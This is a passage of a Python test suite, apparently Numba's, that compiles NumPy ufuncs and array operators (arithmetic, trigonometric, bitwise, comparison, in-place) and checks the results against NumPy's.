if (args[0].dtype.kind not in kinds):
continue
output_type = self._determine_output_type(
input_type, int_output_type, float_output_type)
input_types = (input_type,) * ufunc.nin
output_types = (output_type,) * ufunc.nout
cr = self.cache.compile(pyfunc, input_types + output_types,
flags=flags)
cfunc = cr.entry_point
if isinstance(args[0], np.ndarray):
results = [
np.zeros(args[0].size,
dtype=out_ty.dtype.name)
for out_ty in output_types
]
expected = [
np.zeros(args[0].size,
dtype=out_ty.dtype.name)
for out_ty in output_types
]
else:
results = [
np.zeros(1, dtype=out_ty.dtype.name)
for out_ty in output_types
]
expected = [
np.zeros(1, dtype=out_ty.dtype.name)
for out_ty in output_types
]
invalid_flag = False
with warnings.catch_warnings(record=True) as warnlist:
warnings.simplefilter('always')
pyfunc(*args, *expected)
warnmsg = "invalid value encountered"
for thiswarn in warnlist:
if (issubclass(thiswarn.category, RuntimeWarning)
and str(thiswarn.message).startswith(warnmsg)):
invalid_flag = True
cfunc(*args, *results)
for expected_i, result_i in zip(expected, results):
msg = '\n'.join(["ufunc '{0}' failed",
"inputs ({1}):", "{2}",
"got({3})", "{4}",
"expected ({5}):", "{6}"
]).format(ufunc.__name__,
input_type, input_operand,
output_type, result_i,
expected_i.dtype, expected_i)
try:
np.testing.assert_array_almost_equal(
expected_i, result_i,
decimal=5,
err_msg=msg)
except AssertionError:
if invalid_flag:
# Allow output to mismatch for invalid input
print("Output mismatch for invalid input",
input_tuple, result_i, expected_i)
else:
raise
def basic_int_ufunc_test(self, name=None, flags=no_pyobj_flags):
self.basic_ufunc_test(name, flags=flags,
skip_inputs=[types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C')])
############################################################################
# Math operations
def test_add_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.add, flags=flags)
def test_subtract_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.subtract, flags=flags)
def test_multiply_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.multiply, flags=flags)
def test_divide_ufunc(self, flags=no_pyobj_flags):
# Bear in mind that in python3 divide IS true_divide
# so the out type for int types will be a double
        int_out_type = types.float64
self.basic_ufunc_test(np.divide, flags=flags, int_output_type=int_out_type)
def test_logaddexp_ufunc(self):
self.basic_ufunc_test(np.logaddexp, kinds='f')
def test_logaddexp2_ufunc(self):
self.basic_ufunc_test(np.logaddexp2, kinds='f')
def test_true_divide_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.true_divide, flags=flags, int_output_type=types.float64)
def test_floor_divide_ufunc(self):
self.basic_ufunc_test(np.floor_divide)
def test_negative_ufunc(self, flags=no_pyobj_flags):
# NumPy ufunc has bug with uint32 as input and int64 as output,
# so skip uint32 input.
self.basic_ufunc_test(np.negative, int_output_type=types.int64,
skip_inputs=[types.Array(types.uint32, 1, 'C'), types.uint32],
flags=flags)
def test_positive_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.positive, flags=flags)
def test_power_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.power, flags=flags,
positive_only=True)
def test_gcd_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.gcd, flags=flags, kinds="iu")
def test_lcm_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.lcm, flags=flags, kinds="iu")
def test_remainder_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.remainder, flags=flags)
def test_mod_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.mod, flags=flags, kinds='ifcu',
additional_inputs = [
((np.uint64(np.iinfo(np.uint64).max), np.uint64(16)), types.uint64)
])
def test_fmod_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmod, flags=flags)
def test_abs_ufunc(self, flags=no_pyobj_flags, ufunc=np.abs):
self.basic_ufunc_test(ufunc, flags=flags,
additional_inputs = [
(np.uint32(np.iinfo(np.uint32).max), types.uint32),
(np.uint64(np.iinfo(np.uint64).max), types.uint64),
(np.float32(np.finfo(np.float32).min), types.float32),
(np.float64(np.finfo(np.float64).min), types.float64)
])
def test_absolute_ufunc(self, flags=no_pyobj_flags):
self.test_abs_ufunc(flags=flags, ufunc=np.absolute)
def test_fabs_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fabs, flags=flags, kinds='f')
def test_rint_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.rint, flags=flags, kinds='cf')
def test_sign_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sign, flags=flags)
def test_conj_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.conj, flags=flags)
def test_exp_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.exp, flags=flags, kinds='cf')
def test_exp2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.exp2, flags=flags, kinds='cf')
def test_log_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log, flags=flags, kinds='cf')
def test_log2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log2, flags=flags, kinds='cf')
def test_log10_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log10, flags=flags, kinds='cf')
def test_expm1_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.expm1, flags=flags, kinds='cf')
def test_log1p_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log1p, flags=flags, kinds='cf')
def test_sqrt_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sqrt, flags=flags, kinds='cf')
def test_square_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.square, flags=flags)
def test_reciprocal_ufunc(self, flags=no_pyobj_flags):
# reciprocal for integers doesn't make much sense and is problematic
# in the case of division by zero, as an inf will overflow float to
# int conversions, which is undefined behavior.
to_skip = [types.Array(types.uint32, 1, 'C'), types.uint32,
types.Array(types.int32, 1, 'C'), types.int32,
types.Array(types.uint64, 1, 'C'), types.uint64,
types.Array(types.int64, 1, 'C'), types.int64]
self.basic_ufunc_test(np.reciprocal, skip_inputs=to_skip, flags=flags)
def test_conjugate_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.conjugate, flags=flags)
############################################################################
# Trigonometric Functions
def test_sin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sin, flags=flags, kinds='cf')
def test_cos_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.cos, flags=flags, kinds='cf')
def test_tan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.tan, flags=flags, kinds='cf')
def test_arcsin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arcsin, flags=flags, kinds='cf')
def test_arccos_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arccos, flags=flags, kinds='cf')
def test_arctan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arctan, flags=flags, kinds='cf')
def test_arctan2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arctan2, flags=flags, kinds='cf')
def test_hypot_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.hypot, kinds='f')
def test_sinh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sinh, flags=flags, kinds='cf')
def test_cosh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.cosh, flags=flags, kinds='cf')
def test_tanh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.tanh, flags=flags, kinds='cf')
def test_arcsinh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arcsinh, flags=flags, kinds='cf')
def test_arccosh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arccosh, flags=flags, kinds='cf')
def test_arctanh_ufunc(self, flags=no_pyobj_flags):
        # arctanh is only finite in the range ]-1, 1[
# This means that for any of the integer types it will produce
# conversion from infinity/-infinity to integer. That's undefined
# behavior in C, so the results may vary from implementation to
# implementation. This means that the result from the compiler
# used to compile NumPy may differ from the result generated by
# llvm. Skipping the integer types in this test avoids failed
# tests because of this.
to_skip = [types.Array(types.uint32, 1, 'C'), types.uint32,
types.Array(types.int32, 1, 'C'), types.int32,
types.Array(types.uint64, 1, 'C'), types.uint64,
types.Array(types.int64, 1, 'C'), types.int64]
self.basic_ufunc_test(np.arctanh, skip_inputs=to_skip, flags=flags,
kinds='cf')
def test_deg2rad_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.deg2rad, flags=flags, kinds='f')
def test_rad2deg_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.rad2deg, flags=flags, kinds='f')
def test_degrees_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.degrees, flags=flags, kinds='f')
def test_radians_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.radians, flags=flags, kinds='f')
############################################################################
# Bit-twiddling Functions
def test_bitwise_and_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_and, flags=flags)
def test_bitwise_or_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_or, flags=flags)
def test_bitwise_xor_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_xor, flags=flags)
def test_invert_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.invert, flags=flags)
def test_bitwise_not_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_not, flags=flags)
    # Note: there are no entries for left_shift and right_shift as this
    # harness is not valid for them. The NumPy implementations of left_shift
    # and right_shift have undefined behavior (in C parlance) when the second
    # argument is negative or larger than the number of bits.
    # Also, right_shift with a negative first argument relies on
    # implementation-defined behavior, although numba guarantees "sane"
    # behavior (arithmetic shifts on signed integers, logical shifts on
    # unsigned integers).
############################################################################
# Comparison functions
def test_greater_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.greater, flags=flags)
def test_greater_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.greater_equal, flags=flags)
def test_less_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.less, flags=flags)
def test_less_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.less_equal, flags=flags)
def test_not_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.not_equal, flags=flags)
def test_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.equal, flags=flags)
def test_logical_and_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_and, flags=flags)
def test_logical_or_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_or, flags=flags)
def test_logical_xor_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_xor, flags=flags)
def test_logical_not_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_not, flags=flags)
def test_maximum_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.maximum, flags=flags)
def test_minimum_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.minimum, flags=flags)
def test_fmax_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmax, flags=flags)
def test_fmin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmin, flags=flags)
############################################################################
# Floating functions
def bool_additional_inputs(self):
return [
(np.array([True, False], dtype=np.bool_),
types.Array(types.bool_, 1, 'C')),
]
def test_isfinite_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isfinite, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_isinf_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isinf, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_isnan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isnan, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_signbit_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.signbit, flags=flags)
def test_copysign_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.copysign, flags=flags, kinds='f')
def test_nextafter_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.nextafter, flags=flags, kinds='f')
@_unimplemented
def test_modf_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.modf, flags=flags, kinds='f')
    # Note: there is no entry for ldexp as this harness isn't valid for this
    # ufunc. This is because ldexp requires heterogeneous inputs.
    # However, this ufunc is tested by the TestLoopTypes test classes.
@_unimplemented
def test_frexp_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.frexp, flags=flags, kinds='f')
def test_floor_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.floor, flags=flags, kinds='f')
def test_ceil_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.ceil, flags=flags, kinds='f')
def test_trunc_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.trunc, flags=flags, kinds='f')
def test_spacing_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.spacing, flags=flags, kinds='f')
############################################################################
# Other tests
def binary_ufunc_mixed_types_test(self, ufunc, flags=no_pyobj_flags):
ufunc_name = ufunc.__name__
ufunc = _make_ufunc_usecase(ufunc)
inputs1 = [
(1, types.uint64),
(-1, types.int64),
(0.5, types.float64),
(np.array([0, 1], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1, 1], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 0.5], dtype='f8'), types.Array(types.float64, 1, 'C'))]
inputs2 = inputs1
output_types = [types.Array(types.int64, 1, 'C'),
types.Array(types.float64, 1, 'C')]
pyfunc = ufunc
for input1, input2, output_type in itertools.product(inputs1, inputs2, output_types):
input1_operand = input1[0]
input1_type = input1[1]
input2_operand = input2[0]
input2_type = input2[1]
# Skip division by unsigned int because of NumPy bugs
if ufunc_name == 'divide' and (input2_type == types.Array(types.uint32, 1, 'C') or
input2_type == types.Array(types.uint64, 1, 'C')):
continue
# Skip some subtraction tests because of NumPy bugs
            if ufunc_name == 'subtract' and input1_type == types.Array(types.uint32, 1, 'C') and \
                    input2_type == types.uint32 and output_type == types.Array(types.int64, 1, 'C'):
                continue
            if ufunc_name == 'subtract' and input1_type == types.Array(types.uint32, 1, 'C') and \
                    input2_type == types.uint64 and output_type == types.Array(types.int64, 1, 'C'):
                continue
if ((isinstance(input1_type, types.Array) or
isinstance(input2_type, types.Array)) and
not isinstance(output_type, types.Array)):
continue
cr = self.cache.compile(pyfunc,
(input1_type, input2_type, output_type),
flags=flags)
cfunc = cr.entry_point
if isinstance(input1_operand, np.ndarray):
result = np.zeros(input1_operand.size,
dtype=output_type.dtype.name)
expected = np.zeros(input1_operand.size,
dtype=output_type.dtype.name)
elif isinstance(input2_operand, np.ndarray):
result = np.zeros(input2_operand.size,
dtype=output_type.dtype.name)
expected = np.zeros(input2_operand.size,
dtype=output_type.dtype.name)
else:
result = np.zeros(1, dtype=output_type.dtype.name)
expected = np.zeros(1, dtype=output_type.dtype.name)
cfunc(input1_operand, input2_operand, result)
pyfunc(input1_operand, input2_operand, expected)
scalar_type = getattr(output_type, 'dtype', output_type)
prec = ('single'
if scalar_type in (types.float32, types.complex64)
else 'double')
self.assertPreciseEqual(expected, result, prec=prec)
def test_broadcasting(self):
# Test unary ufunc
pyfunc = _make_ufunc_usecase(np.negative)
input_operands = [
np.arange(3, dtype='i8'),
np.arange(3, dtype='i8').reshape(3,1),
np.arange(3, dtype='i8').reshape(1,3),
np.arange(3, dtype='i8').reshape(3,1),
np.arange(3, dtype='i8').reshape(1,3),
np.arange(3*3, dtype='i8').reshape(3,3)]
output_operands = [
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3)]
for x, result in zip(input_operands, output_operands):
input_type = types.Array(types.uint64, x.ndim, 'C')
output_type = types.Array(types.int64, result.ndim, 'C')
cr = self.cache.compile(pyfunc, (input_type, output_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = np.zeros(result.shape, dtype=result.dtype)
np.negative(x, expected)
cfunc(x, result)
self.assertPreciseEqual(result, expected)
# Test binary ufunc
pyfunc = _make_ufunc_usecase(np.add)
input1_operands = [
np.arange(3, dtype='u8'),
np.arange(3*3, dtype='u8').reshape(3,3),
np.arange(3*3*3, dtype='u8').reshape(3,3,3),
np.arange(3, dtype='u8').reshape(3,1),
np.arange(3, dtype='u8').reshape(1,3),
np.arange(3, dtype='u8').reshape(3,1,1),
np.arange(3*3, dtype='u8').reshape(3,3,1),
np.arange(3*3, dtype='u8').reshape(3,1,3),
np.arange(3*3, dtype='u8').reshape(1,3,3)]
input2_operands = input1_operands
for x, y in itertools.product(input1_operands, input2_operands):
input1_type = types.Array(types.uint64, x.ndim, 'C')
input2_type = types.Array(types.uint64, y.ndim, 'C')
output_type = types.Array(types.uint64, max(x.ndim, y.ndim), 'C')
cr = self.cache.compile(pyfunc, (input1_type, input2_type, output_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = np.add(x, y)
result = np.zeros(expected.shape, dtype='u8')
cfunc(x, y, result)
self.assertPreciseEqual(result, expected)
def test_implicit_output_npm(self):
with self.assertRaises(TypeError):
def myadd(a0, a1):
return np.add(a0, a1)
arr_ty = types.Array(types.uint64, 1, 'C')
cr = compile_isolated(myadd, (arr_ty, arr_ty),
flags=no_pyobj_flags)
def test_broadcast_implicit_output_npm_nrt(self):
def pyfunc(a0, a1):
return np.add(a0, a1)
input1_operands = [
np.arange(3, dtype='u8'),
np.arange(3*3, dtype='u8').reshape(3,3),
np.arange(3*3*3, dtype='u8').reshape(3,3,3),
np.arange(3, dtype='u8').reshape(3,1),
np.arange(3, dtype='u8').reshape(1,3),
np.arange(3, dtype='u8').reshape(3,1,1),
np.arange(3*3, dtype='u8').reshape(3,3,1),
np.arange(3*3, dtype='u8').reshape(3,1,3),
np.arange(3*3, dtype='u8').reshape(1,3,3)]
input2_operands = input1_operands
for x, y in itertools.product(input1_operands, input2_operands):
input1_type = types.Array(types.uint64, x.ndim, 'C')
input2_type = types.Array(types.uint64, y.ndim, 'C')
cr = self.cache.compile(pyfunc, (input1_type, input2_type),
flags=enable_nrt_flags)
cfunc = cr.entry_point
expected = np.add(x, y)
result = cfunc(x, y)
np.testing.assert_array_equal(expected, result)
def test_implicit_output_layout_binary(self):
def pyfunc(a0, a1):
return np.add(a0, a1)
# C layout
X = np.linspace(0, 1, 20).reshape(4, 5)
# F layout
Y = np.array(X, order='F')
# A layout
Z = X.reshape(5, 4).T[0]
Xty = typeof(X)
assert X.flags.c_contiguous and Xty.layout == 'C'
Yty = typeof(Y)
assert Y.flags.f_contiguous and Yty.layout == 'F'
Zty = typeof(Z)
assert Zty.layout == 'A'
assert not Z.flags.c_contiguous
assert not Z.flags.f_contiguous
testcases = list(itertools.permutations([X, Y, Z], 2))
testcases += [(X, X)]
testcases += [(Y, Y)]
testcases += [(Z, Z)]
for arg0, arg1 in testcases:
cr = self.cache.compile(pyfunc, (typeof(arg0), typeof(arg1)),
flags=enable_nrt_flags)
expected = pyfunc(arg0, arg1)
result = cr.entry_point(arg0, arg1)
self.assertEqual(expected.flags.c_contiguous,
result.flags.c_contiguous)
self.assertEqual(expected.flags.f_contiguous,
result.flags.f_contiguous)
np.testing.assert_array_equal(expected, result)
def test_implicit_output_layout_unary(self):
def pyfunc(a0):
return np.sqrt(a0)
# C layout
X = np.linspace(0, 1, 20).reshape(4, 5)
# F layout
Y = np.array(X, order='F')
# A layout
Z = X.reshape(5, 4).T[0]
Xty = typeof(X)
assert X.flags.c_contiguous and Xty.layout == 'C'
Yty = typeof(Y)
assert Y.flags.f_contiguous and Yty.layout == 'F'
Zty = typeof(Z)
assert Zty.layout == 'A'
assert not Z.flags.c_contiguous
assert not Z.flags.f_contiguous
for arg0 in [X, Y, Z]:
cr = self.cache.compile(pyfunc, (typeof(arg0),),
flags=enable_nrt_flags)
expected = pyfunc(arg0)
result = cr.entry_point(arg0)
self.assertEqual(expected.flags.c_contiguous,
result.flags.c_contiguous)
self.assertEqual(expected.flags.f_contiguous,
result.flags.f_contiguous)
np.testing.assert_array_equal(expected, result)
class TestArrayOperators(BaseUFuncTest, TestCase):
def _check_results(self, expected, got):
self.assertEqual(expected.dtype.kind, got.dtype.kind)
np.testing.assert_array_almost_equal(expected, got)
def unary_op_test(self, operator, flags=enable_nrt_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None):
operator_func = _make_unary_ufunc_op_usecase(operator)
inputs = list(self.inputs)
inputs.extend(additional_inputs)
pyfunc = operator_func
for input_tuple in inputs:
input_operand, input_type = input_tuple
if ((input_type in skip_inputs) or
(not isinstance(input_type, types.Array))):
continue
cr = self.cache.compile(pyfunc, (input_type,),
flags=flags)
cfunc = cr.entry_point
expected = pyfunc(input_operand)
got = cfunc(input_operand)
self._check_results(expected, got)
def binary_op_test(self, operator, flags=enable_nrt_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None,
positive_rhs=False):
operator_func = _make_binary_ufunc_op_usecase(operator)
inputs = list(self.inputs)
inputs.extend(additional_inputs)
pyfunc = operator_func
# when generating arbitrary sequences, we use a fixed seed
# for deterministic testing
random_state = np.random.RandomState(1)
for input_tuple in inputs:
input_operand1, input_type = input_tuple
input_dtype = numpy_support.as_dtype(
getattr(input_type, "dtype", input_type))
input_type1 = input_type
if input_type in skip_inputs:
continue
if positive_rhs:
zero = np.zeros(1, dtype=input_dtype)[0]
# If we only use two scalars, the code generator will not
# select the ufunctionalized operator, so we mix it up.
if isinstance(input_type, types.Array):
input_operand0 = input_operand1
input_type0 = input_type
if positive_rhs and np.any(input_operand1 < zero):
continue
else:
input_operand0 = (random_state.uniform(0, 100, 10)).astype(
input_dtype)
input_type0 = typeof(input_operand0)
if positive_rhs and input_operand1 < zero:
continue
cr = self.cache.compile(pyfunc, (input_type0, input_type1),
flags=flags)
cfunc = cr.entry_point
expected = pyfunc(input_operand0, input_operand1)
got = cfunc(input_operand0, input_operand1)
self._check_results(expected, got)
def bitwise_additional_inputs(self):
# For bitwise operators, we want to check the results for boolean
# arrays (see #1813).
return [
(True, types.boolean),
(False, types.boolean),
(np.array([True, False]), types.Array(types.boolean, 1, 'C')),
]
def binary_int_op_test(self, *args, **kws):
skip_inputs = kws.setdefault('skip_inputs', [])
skip_inputs += [
types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C'),
]
return self.binary_op_test(*args, **kws)
def binary_bitwise_op_test(self, *args, **kws):
additional_inputs = kws.setdefault('additional_inputs', [])
additional_inputs += self.bitwise_additional_inputs()
return self.binary_int_op_test(*args, **kws)
def inplace_op_test(self, operator, lhs_values, rhs_values,
lhs_dtypes, rhs_dtypes):
operator_func = _make_inplace_ufunc_op_usecase(operator)
pyfunc = operator_func
# The left operand can only be an array, while the right operand
# can be either an array or a scalar
lhs_inputs = [np.array(lhs_values, dtype=dtype)
for dtype in lhs_dtypes]
rhs_arrays = [np.array(rhs_values, dtype=dtype)
for dtype in rhs_dtypes]
rhs_scalars = [dtype(v) for v in rhs_values for dtype in rhs_dtypes]
rhs_inputs = rhs_arrays + rhs_scalars
for lhs, rhs in itertools.product(lhs_inputs, rhs_inputs):
lhs_type = typeof(lhs)
rhs_type = typeof(rhs)
cr = self.cache.compile(pyfunc, (lhs_type, rhs_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = lhs.copy()
pyfunc(expected, rhs)
got = lhs.copy()
cfunc(got, rhs)
self.assertPreciseEqual(got, expected)
def inplace_float_op_test(self, operator, lhs_values, rhs_values):
# Also accept integer inputs for the right operand (they should
# be converted to float).
return self.inplace_op_test(operator, lhs_values, rhs_values,
(np.float32, np.float64),
(np.float32, np.float64, np.int64))
def inplace_int_op_test(self, operator, lhs_values, rhs_values):
self.inplace_op_test(operator, lhs_values, rhs_values,
(np.int16, np.int32, np.int64),
(np.int16, np.uint32))
def inplace_bitwise_op_test(self, operator, lhs_values, rhs_values):
self.inplace_int_op_test(operator, lhs_values, rhs_values)
self.inplace_op_test(operator, lhs_values, rhs_values,
(np.bool_,), (np.bool_, np.bool_))
# ____________________________________________________________
# Unary operators
def test_unary_positive_array_op(self):
self.unary_op_test('+')
def test_unary_negative_array_op(self):
self.unary_op_test('-')
def test_unary_invert_array_op(self):
self.unary_op_test('~',
skip_inputs=[types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C')],
additional_inputs=self.bitwise_additional_inputs())
# ____________________________________________________________
# Inplace operators
def test_inplace_add(self):
self.inplace_float_op_test('+=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.iadd, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_sub(self):
self.inplace_float_op_test('-=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.isub, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_mul(self):
self.inplace_float_op_test('*=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.imul, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_floordiv(self):
self.inplace_float_op_test('//=', [-1, 1.5, 3], [-5, 1.25, 2.5])
self.inplace_float_op_test(operator.ifloordiv, [-1, 1.5, 3], [-5, 1.25, 2.5])
def test_inplace_div(self):
self.inplace_float_op_test('/=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.itruediv, [-1, 1.5, 3], [-5, 1.25, 2.5])
def test_inplace_remainder(self):
self.inplace_float_op_test('%=', [-1, 1.5, 3], [-5, 2, 2.5])
self.inplace_float_op_test(operator.imod, [-1, 1.5, 3], [-5, 2, 2.5])
def test_inplace_pow(self):
self.inplace_float_op_test('**=', [-1, 1.5, 3], [-5, 2, 2.5])
self.inplace_float_op_test(operator.ipow, [-1, 1.5, 3], [-5, 2, 2.5])
def test_inplace_and(self):
self.inplace_bitwise_op_test('&=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.iand, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_or(self):
self.inplace_bitwise_op_test('|=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.ior, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_xor(self):
self.inplace_bitwise_op_test('^=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.ixor, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_lshift(self):
self.inplace_int_op_test('<<=', [0, 5, -10, -51], [0, 1, 4, 14])
self.inplace_int_op_test(operator.ilshift, [0, 5, -10, -51], [0, 1, 4, 14])
def test_inplace_rshift(self):
self.inplace_int_op_test('>>=', [0, 5, -10, -51], [0, 1, 4, 14])
self.inplace_int_op_test(operator.irshift, [0, 5, -10, -51], [0, 1, 4, 14])
    def test_unary_positive_array_op_copy(self):
'''
Verify that the unary positive operator copies values, and doesn't
just alias to the input array (mirrors normal Numpy/Python
interaction behavior).
'''
# Test originally from @gmarkall
def f(a1):
a2 = +a1
a1[0] = 3
a2[1] = 4
return a2
a1 = np.zeros(10)
a2 = f(a1)
self.assertTrue(a1[0] != a2[0] and a1[1] != a2[1])
a3 = np.zeros(10)
a4 = njit(f)(a3)
self.assertTrue(a3[0] != a4[0] and a3[1] != a4[1])
np.testing.assert_array_equal(a1, a3)
np.testing.assert_array_equal(a2, a4)
# ____________________________________________________________
# Binary operators
def test_add_array_op(self):
self.binary_op_test('+')
def test_subtract_array_op(self):
self.binary_op_test('-')
def test_multiply_array_op(self):
self.binary_op_test('*')
    def test_divide_array_op(self):
        int_out_type = types.float64
        self.binary_op_test('/', int_output_type=int_out_type)
def test_floor_divide_array_op(self):
# Avoid floating-point zeros as x // 0.0 can have varying results
# depending on the algorithm (which changed across Numpy versions)
self.inputs = [
(np.uint32(1), types.uint32),
(np.int32(-2), types.int32),
(np.int32(0), types.int32),
(np.uint64(4), types.uint64),
(np.int64(-5), types.int64),
(np.int64(0), types.int64),
(np.float32(-0.5), types.float32),
(np.float32(1.5), types.float32),
(np.float64(-2.5), types.float64),
(np.float64(3.5), types.float64),
(np.array([1,2], dtype='u4'), types.Array(types.uint32, 1, 'C')),
(np.array([3,4], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1,1,5], dtype='i4'), types.Array(types.int32, 1, 'C')),
(np.array([-1,1,6], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 1.5], dtype='f4'), types.Array(types.float32, 1, 'C')),
(np.array([-2.5, 3.5], dtype='f8'), types.Array(types.float64, 1, 'C')),
]
self.binary_op_test('//')
def test_remainder_array_op(self):
self.binary_op_test('%')
def test_power_array_op(self):
self.binary_op_test('**', positive_rhs=True)
def test_left_shift_array_op(self):
self.binary_int_op_test('<<', positive_rhs=True)
def test_right_shift_array_op(self):
self.binary_int_op_test('>>', positive_rhs=True)
def test_bitwise_and_array_op(self):
self.binary_bitwise_op_test('&')
def test_bitwise_or_array_op(self):
